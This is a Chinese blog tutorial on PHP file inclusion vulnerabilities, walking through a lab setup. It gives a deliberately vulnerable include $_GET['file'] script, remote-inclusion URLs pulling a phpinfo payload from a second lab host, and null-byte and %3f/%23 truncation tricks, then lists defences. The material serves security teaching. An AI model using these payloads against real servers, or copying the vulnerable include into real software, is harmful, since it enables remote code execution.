文件包含漏洞(二)

最新推荐文章于 2023-03-19 22:45:09 发布
最新推荐文章于 2023-03-19 22:45:09 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: OWASP TOP10 文章标签: php 服务器 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51730169/article/details/125549196
版权

一、包含远程文件

1、原理分析

当远程文件开启时,可以包含远程文件到本地执行。当 allow_url_fopen=On、allow_url_include=ON 两个条件同时
为 On 允许远程包含文件。

2、实操

2.1 虚拟机搭建test.php

<?php
include $_GET['file'];

?>

在这里插入图片描述
在这里插入图片描述

2.2 python本地搭建简历服务器

<?php
phpinfo();

?>
C:\Users\Administrator

在这里插入图片描述

2.3 远程文件包含

http://192.168.127.132/test.php?file=http://192.168.1.107:8089/1.txt

在这里插入图片描述

二、文件包含截断攻击

文件包含截断攻击,在 php 版本小于 5.3.4 允许使用%00 截断,在使用 include 等文件包含函数,可以截断文件名,
截断会受 gpc影响,如果 gpc为 On 时,%00会被转以成\0 截断会失败。

<?php 
include $GET['file'].'.php';
?>
传入 file 文件名拼接.php 在用 include 引入文件。file 参数可控的会造成漏洞。

1、文件包含%00 截断

上传带有恶意代码的文件到网站目录,包含引入再进行 00 截断。
当前测试的版本是 php 5.2.17,gpc=off

在这里插入图片描述

http://192.168.127.132/test.php?file=1.jpg%00

在这里插入图片描述

2、远程包含截断

2.1 原理分析

适用于远程截断的字符有:
符号URL编码
#%23
?%3f
00%00
以上这个字符都可以截断:

allow_url_fopen =On
allow_url_include=On

2.2 环境搭建

<?php
include $_GET['file'];

?>

在这里插入图片描述
在这里插入图片描述

2.3 python本地搭建简历服务器

<?php
phpinfo();

?>
C:\Users\Administrator

在这里插入图片描述

2.4 远程文件包含

http://192.168.127.132/test.php?file=http://192.168.1.107:8089/1.txt%00

在这里插入图片描述

http://192.168.127.132/test.php?file=http://192.168.1.107:8089/1.txt%3f

在这里插入图片描述

http://192.168.127.132/test.php?file=http://192.168.1.107:8089/1.txt%23

在这里插入图片描述

三、防御方案

1.严格判断包含中的参数是否外部可控,因为文件包含漏洞利用成功与否的关键点就在于被包含的文件是否可被外部控制;
2.路径限制:限制被包含的文件只能在某一文件内,一定要禁止目录跳转字符,如:"../"3.包含文件验证:验证被包含的文件是否是白名单中的一员;
4.尽量不要使用动态包含,可以在需要包含的页面固定写好,如:include('head.php')5.设置 allow_url_include为 Off
Aτθ
关注
专栏目录
web入门-文件包含
wo41ge的博客
11-28 3312
web78~php伪协议 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 直接payload ?file=php://filter/read=convert.base64-encode/resource=flag.php web79~Data协议 <?php if(isset($_GET['file
通达OA v11.8 getway.php 远程文件包含漏洞.md
最新发布
09-07
通达OA漏洞合集
文件包含漏洞一览
Amire0x的小乐园
11-08 497
文件包含 原因 文件包含函数加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致了执行了非预期的代码。 php文件包含相关函数都是无论其参数的扩展名是什么,都会将其内 容作为php代码解析,这可能就会造成任意的php代码执行。 如果一个功能需要包含用户传来的参数时,且开发者又没有对用户的输入进行检测和过滤,那么就 很可能使攻击者利用该功能进行文件包含漏洞的攻击。 相关函数 引起该漏洞的通常是 include() include() 如果出错的话,只会提出警告,会继续执行后
PHP 文件包含之文件路径截断(转)
weixin_30730151的博客
07-23 292
PHP 文件包含之文件路径截断 以下是网络摘要: 1. 本来还以为挖到金矿了,跟黑哥交流后发现只能应用于Win32平台,使这个BUG的威力暴减,基本没有太大危害了,因为在WIN32平台使用PHP的实在太少了。 include $_GET[file].”.php”; 以前我们使用%00来截断,现在的PHP版本基本上已经失效了。挖掘思路是黑哥之前提到的结合多个环境下的条件,触...
文件包含漏洞
nobugnomoney的博客
03-23 5057
一、文件包含漏洞原理 PHP语言提供的文件包含功能太强大,太灵活,所以包含漏洞常常出现在PHP中,但不只是PHP中有包含漏洞,其他语言也有包含漏洞,如java等,本篇主要以PHP为例讲解原理及其利用技巧: PHP提供4个文件包含的函数 1、include():找不到文件时继续执行,只会警告 2、include_once():与include()类似,只是如果文件中的代码已被包含,则不会再次包含 3、require():找不到文件时会爆出致命的错误; 4、require_once():与上述的类似; 1、本地
php.ini中allow_url_fopen和allow_url_include的设置
weixin_30906701的博客
11-02 987
all_url_include在php 5.2以后添加,安全方便的设置(php的默认设置)为:allow_url_fopen=on;all_url_include=off;allow_url_fopen = On (允许打开URL文件,预设启用)allow_url_fopen = Off (禁止打开URL文件)allow_url_incl...
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
web 网站文件包含漏洞和攻击-运维安全详细笔记总结 文件包含漏洞是指攻击者通过上传恶意文件,利用服务器文件包含功能来执行恶意代码,从而获取服务器的控制权。文件包含漏洞可以分为本地文件包含漏洞和远程文件...
Web应用安全文件包含漏洞简介.pptx
06-18
文件包含漏洞的防御措施主要包括:限制文件包含的来源,确保只包含预期的、安全的文件;使用绝对路径而非相对路径,防止意外包含其他目录的文件;禁用不必要的文件包含功能,如`allow_url_fopen`;对用户输入进行...
08_理论8_文件包含漏洞的原理与实践_20180921
02-10
#### 文件包含漏洞的概念与分类 **概念:** 文件包含PHP等脚本语言中常用的功能之一,其目的是为了重用代码。通过使用`include`或`require`等语句,开发者可以在多个文件之间共享相同的代码片段,如页头、...
php包含截断小结.txt
07-24
php截断技术
文件包含漏洞文件包含Bypass漏洞基础
m0_59598029的博客
03-19 211
服务器]通过PHP的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到攻击的目的。2。
渗透测试面试题
热门推荐
吃个榴莲压压鲸的博客
03-23 2万+
渗透篇 1、介绍一下自认为有趣的挖洞经历 挖洞也有分很多种类型,一种是以渗透、一种是以找漏洞为主,如果是前者会想各种办法获取权限继而获取想要的的东西完成渗透目标,这类跟HW类似,目标各种漏洞不算,要有Shell,服务器权限才给分,这才是最接近实战渗透,跟某部门有合作的话也是属于这种打击网络犯罪获得权限、传销数据、组织架构,服务器权限、等...... 2、你平时用的比较多的漏洞是哪些?相关漏洞的原理?以及对应漏洞的修复方案? SQL注入、密码组合,前者防护分为几种,CDN -> Web
PHP文件包含漏洞利用思路与Bypass总结手册(三)
蚁景网安学院
05-06 510
绕过姿势我们平常很多时候碰到的情况肯定不会是简单的include $_GET['file'];这样直接把变量传入包含函数的。在很多时候包含的变量/文件不是完全可控的。现在...
PHP任意文件包含绕过截断新姿势
weixin_33859844的博客
03-18 394
前言 此方法是@l3m0n叔叔给我分享的,原文已经发布在90sec 我没有90sec的账号,所以自己实践一下,顺道安利给访问我博客的小伙伴。 适用情况 可以控制协议的情况下,如果%00无法截断包含,可使用这招。 &lt;?php $a = $_GET['file']; include $a.'.html.php'; 思路&amp;方法 思路主要是利用了PHP的一个...
PHP文件包含漏洞详解
xysoul的专栏
06-30 1万+
http://tieba.baidu.com/p/2310282657 什么是”远程文件包含漏洞”?服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。 一、什么才是”远程文件包含漏洞”? 回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以
文件包含漏洞详解
m0_55854679的博客
03-12 1万+
文章目录File Inclusion(文件包含)概述漏洞产生原因漏洞特点注小知识文件包含函数includerequireinclude_oncerequire_once文件包含示例pikachu靶场本地文件包含漏洞演示pikachu靶场远程文件包含漏洞演示文件包含漏洞的利用PHP伪协议(文件包含漏洞常用的利用方法)文件包含漏洞的防范措施phpMyadmin靶场练习 File Inclusion(文件包含)概述 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件
PHP文件包含漏洞深度解析
文件包含漏洞的原理及特点:当应用程序允许用户控制包含文件的路径时,就可能出现文件包含漏洞。攻击者可以通过构造特定的输入,使得程序包含攻击者指定的文件,这可能是服务器上的任意文件,甚至远程服务器上的文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值